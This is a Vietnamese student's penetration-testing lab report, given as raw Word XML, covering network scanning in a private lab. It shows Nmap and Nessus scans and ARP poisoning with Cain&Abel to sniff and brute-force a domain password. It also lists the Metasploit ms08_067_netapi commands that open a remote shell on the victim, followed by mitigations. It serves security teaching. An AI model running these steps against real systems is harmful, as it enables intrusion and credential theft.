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EB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Huỳnh Nghiêm Phú Hưng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1712478</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E86D9E" w:rsidRPr="002A026D" w:rsidRDefault="00E86D9E" w:rsidP="002A0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Bài thực hành lab 2: Scanning Network</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF5B8A" w:rsidRPr="002A026D" w:rsidRDefault="00FF5B8A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C68C76" wp14:editId="5DBD036E">
            <wp:extent cx="5943600" cy="444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8A" w:rsidRPr="002A026D" w:rsidRDefault="00FF5B8A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A50AF6" wp14:editId="5C77226E">
            <wp:extent cx="5943600" cy="193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Câu 1:</w:t>
      </w:r>
      <w:r w:rsidR="002A026D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A026D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Thực hiện cài đặt Nmap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Nhập: sudo apt install nmap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lastRenderedPageBreak/>
        <w:t>- Kiểm tra Nmap trên máy bằng lệnh nmap –V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7F0E55" wp14:editId="26F4B585">
            <wp:extent cx="5943600" cy="108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Thực hiện cài đặt và chạy dịch vụ Nessus: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Sau khi tải file cài đặt về dùng câu lênh sudo dpkg –i &lt;tên file cài đặt&gt;.deb để thực hiện cài đặt.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Sau đó sẽ nhập: /bin/systemctl start nessusd.service để chạy dịch vụ nessus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 xml:space="preserve">Kiểm tra thông tin trên </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="008041AA" w:rsidRPr="002A026D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>https://ubuntu:8834</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008041AA" w:rsidRPr="002A026D" w:rsidRDefault="008041AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pP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E540E0" wp14:editId="2D6CF33C">
            <wp:extent cx="594360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065"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627348" wp14:editId="1FED490E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1AA" w:rsidRPr="002A02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C377B1" wp14:editId="22D3A0C3">
            <wp:extent cx="5943600" cy="2188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-Cài đặt Cain&amp;Abel trên máy Attacker: trước tiên cần tải và cài đặt Win</w:t>
      </w:r>
      <w:r w:rsidR="00A719E9" w:rsidRPr="002A026D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="002A026D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>cap 4.3.1. Sau đó tải và cài đặt Cain&amp;Abel.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4AF125" wp14:editId="407A32D3">
            <wp:extent cx="5943600" cy="466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Câu 2: - Sử dụng Nmap để scan host nạn nhân bằng lệnh: nmap -T4 -A 192.168.78.3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D41065" w:rsidRPr="002A026D" w:rsidRDefault="005360D8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79D682" wp14:editId="35DD2BD1">
            <wp:extent cx="5943600" cy="4245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Câu 3: - Sử dụng Nessus để quét các lỗ hổng trên host nạn nhân bằng tùy chọn Basic Scan Network =&gt; Target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E63192" w:rsidRPr="002A026D" w:rsidRDefault="00E63192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92521BF" wp14:editId="53E9E100">
            <wp:extent cx="5943600" cy="4648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Sau quá trình Scan sẽ thấy được các lỗ hổng của host nạn nhân</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D41065" w:rsidRPr="002A026D" w:rsidRDefault="00E63192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F419A8" wp14:editId="4E41D7F1">
            <wp:extent cx="5943600" cy="3196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E63192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L</w:t>
      </w:r>
      <w:r w:rsidR="00D41065" w:rsidRPr="002A026D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ỗ hổ</w:t>
      </w:r>
      <w:r w:rsidRPr="002A026D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ng remote</w:t>
      </w:r>
      <w:r w:rsidR="00CB21C9" w:rsidRPr="002A026D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> MS08-067</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D41065" w:rsidRPr="002A026D" w:rsidRDefault="00CB21C9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557070" wp14:editId="1334D38F">
            <wp:extent cx="506730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Câu 4: - Sử dụng Cain&amp;Abel để sniff username và password của client. Đầu tiên cần scan network và xác định IP của server và client.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D41065" w:rsidRPr="002A026D" w:rsidRDefault="00847613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5BACB8" wp14:editId="4FCA02F0">
            <wp:extent cx="5943600" cy="1575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lastRenderedPageBreak/>
        <w:t>- Thực hiện ARP poisioning, để khi client gửi xác thực lên user sẽ phải đi qua máy của Attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00847613" w:rsidRPr="002A026D" w:rsidRDefault="00847613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2DDCC" wp14:editId="7C4FD6E1">
            <wp:extent cx="5943600" cy="404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Khi client bắt đầu đăng nhập tài khoản domain, tại máy attacker sẽ bắt được gói xác thực từ client gửi lên và lưu trong phần Password của Cain&amp;Abel, chọn Send all to Cracker. Sau đó tiến hành dò tìm mật khẩu bằng phương pháp Bruteforce.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F31E5C" w:rsidRPr="002A026D" w:rsidRDefault="00F31E5C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D41065" w:rsidRPr="002A026D" w:rsidRDefault="00D41065">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof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lastRenderedPageBreak/>
        <w:t>- Chọn định dạng mật khẩu, độ dài mật khẩu và bắt đầu quá trình bruteforce để xác định mật khẩu. Mật khẩu sau khi crack đượ</w:t>
      </w:r>
      <w:r w:rsidR="00F31E5C" w:rsidRPr="002A026D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>c là “hung”</w:t>
      </w:r>
      <w:r w:rsidRPr="002A026D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> ứng với user client1.</w:t>
      </w:r>
      <w:r w:rsidR="00F31E5C" w:rsidRPr="002A026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F31E5C"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3C784E" wp14:editId="57DFFBD0">
            <wp:extent cx="558165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C9" w:rsidRPr="002A026D" w:rsidRDefault="00CB21C9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B9F8F" wp14:editId="37080326">
            <wp:extent cx="5943600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Sử dụng Metasploit để remote đến client bằng lỗ hổ</w:t>
      </w:r>
      <w:r w:rsidR="00F31E5C" w:rsidRPr="002A026D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ng ms09_001</w:t>
      </w:r>
      <w:r w:rsidRPr="002A026D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> đã quét được bằng Nessus ở trên. Đầu tiên cần cài đặt Metasploit. Ở đây sử dụng hệ điều hành Kali Linux vì đã cài đặt sẵn Metasploit. Mở trong terminal với quyền root và nhập lần lượt các lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D41065" w:rsidRPr="002A026D" w:rsidRDefault="0086202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</w:t>
      </w:r>
      <w:r w:rsidR="00D41065" w:rsidRPr="002A026D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> msfconsole </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA106D" w:rsidRPr="002A026D" w:rsidRDefault="00AA106D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316862" wp14:editId="1A6E1A37">
            <wp:extent cx="5943600" cy="3170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86202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</w:t>
      </w:r>
      <w:r w:rsidR="00D41065" w:rsidRPr="002A026D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> use exploit/windows/smb/ms08_067_netapi </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D41065" w:rsidRPr="002A026D" w:rsidRDefault="0086202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set rhost 192.168.78</w:t>
      </w:r>
      <w:r w:rsidR="00D41065" w:rsidRPr="002A026D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">.3 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0086202E" w:rsidRPr="002A026D" w:rsidRDefault="0086202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set lhost 192.168.78</w:t>
      </w:r>
      <w:r w:rsidR="00D41065" w:rsidRPr="002A026D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">.4 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D41065" w:rsidRPr="002A026D" w:rsidRDefault="0086202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</w:t>
      </w:r>
      <w:r w:rsidR="00D41065" w:rsidRPr="002A026D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D41065" w:rsidRDefault="0086202E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</w:t>
      </w:r>
      <w:r w:rsidR="00D41065" w:rsidRPr="002A026D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1D02" w:rsidRDefault="00EA1D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(Windown có thể ảnh hưởng đến việc exploit thành công hoặc thất bại)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A309B" w:rsidRDefault="00EA1D0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698B1D" wp14:editId="572CDE29">
            <wp:extent cx="5943600" cy="2943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9B" w:rsidRPr="002A026D" w:rsidRDefault="002A309B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pP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Sau khi kết nối đến client thành công, kiểm tra ip bằng lệnh ipconfig.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D41065" w:rsidRPr="002A026D" w:rsidRDefault="00EA1D0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C11433" wp14:editId="4D8A47C9">
            <wp:extent cx="51054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 xml:space="preserve">Câu 5: Các biện pháp khắc phục: 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Luôn bật tường lửa để phòng vệ</w:t>
      </w:r>
      <w:r w:rsidR="00AD2BE5" w:rsidRPr="002A026D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> và chỉ cho phép allow các ứng dụng của công ty</w:t>
      </w:r>
      <w:r w:rsidRPr="002A026D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.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Cập nhật OS, các phần mềm trong máy lên phiên bản mới nhất, cập nhật</w:t>
      </w:r>
      <w:r w:rsidR="00AD2BE5" w:rsidRPr="002A026D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> các phần mềm</w:t>
      </w:r>
      <w:r w:rsidRPr="002A026D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> phát hiện các virus</w:t>
      </w:r>
      <w:r w:rsidR="00AD2BE5" w:rsidRPr="002A026D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, diệt virus </w:t>
      </w:r>
      <w:r w:rsidRPr="002A026D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, malware mới. 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 xml:space="preserve">- Các mật khẩu </w:t>
      </w:r>
      <w:r w:rsidR="00AD2BE5" w:rsidRPr="002A026D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>cần phải</w:t>
      </w:r>
      <w:r w:rsidRPr="002A026D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> có độ phức tạp</w:t>
      </w:r>
      <w:r w:rsidR="00AD2BE5" w:rsidRPr="002A026D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> cao tối thiểu trên 10 ký tự</w:t>
      </w:r>
      <w:r w:rsidRPr="002A026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Đóng các port không sử dụng</w:t>
      </w:r>
      <w:r w:rsidR="00AD2BE5" w:rsidRPr="002A026D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> hoặc</w:t>
      </w:r>
      <w:r w:rsidRPr="002A026D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> không cần thiế</w:t>
      </w:r>
      <w:r w:rsidR="00AD2BE5" w:rsidRPr="002A026D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>t trên server, điều này trành việc hacker có thể scan ra các các lỗ khổng và khai thác</w:t>
      </w:r>
      <w:r w:rsidRPr="002A026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 xml:space="preserve">- Hệ thống mạng cần được cài đặt chỉ cho các địa chỉ MAC đã được quy định có quyền tham gia vào mạng nội bộ để phòng tránh hacker xâm nhập. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D41065" w:rsidRPr="002A026D" w:rsidRDefault="00D41065">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A026D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>- Cài đặt các hệ thống phát hiện xâm nhập (IDS) và phòng chống xâm nhập (IPS) để tránh sniffer, scan network</w:t>
      </w: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</w:p>
    <w:p w:rsidR="00E86D9E" w:rsidRPr="002A026D" w:rsidRDefault="00E86D9E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00E86D9E" w:rsidRPr="002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FE"/>
    <w:rsid w:val="000B572A"/>
    <w:rsid w:val="002A026D"/>
    <w:rsid w:val="002A309B"/>
    <w:rsid w:val="005360D8"/>
    <w:rsid w:val="00540FFE"/>
    <w:rsid w:val="00703E4A"/>
    <w:rsid w:val="008041AA"/>
    <w:rsid w:val="00847613"/>
    <w:rsid w:val="0086202E"/>
    <w:rsid w:val="009370F3"/>
    <w:rsid w:val="009B26EB"/>
    <w:rsid w:val="00A30856"/>
    <w:rsid w:val="00A719E9"/>
    <w:rsid w:val="00AA106D"/>
    <w:rsid w:val="00AD2BE5"/>
    <w:rsid w:val="00CB21C9"/>
    <w:rsid w:val="00D41065"/>
    <w:rsid w:val="00E63192"/>
    <w:rsid w:val="00E86D9E"/>
    <w:rsid w:val="00EA1D02"/>
    <w:rsid w:val="00F31E5C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2F7F-8533-466B-934A-EFD4EBF8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ubuntu:8834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2021-04-14T15:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-08T15:45:00Z</dcterms:modified>
</cp:coreProperties>
</file>